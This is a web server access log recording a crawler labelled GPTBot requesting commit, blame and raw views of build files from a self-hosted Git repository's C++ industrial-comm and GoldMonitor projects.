"/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10305] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10306] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11900] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10305] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17969] [Gzip 11.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12884] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9988] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9990] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11088] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9986] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44566] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44564] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44564] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11622] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69286] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17081] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39472] [Gzip 31.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39477] [Gzip 31.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39474] [Gzip 31.81] 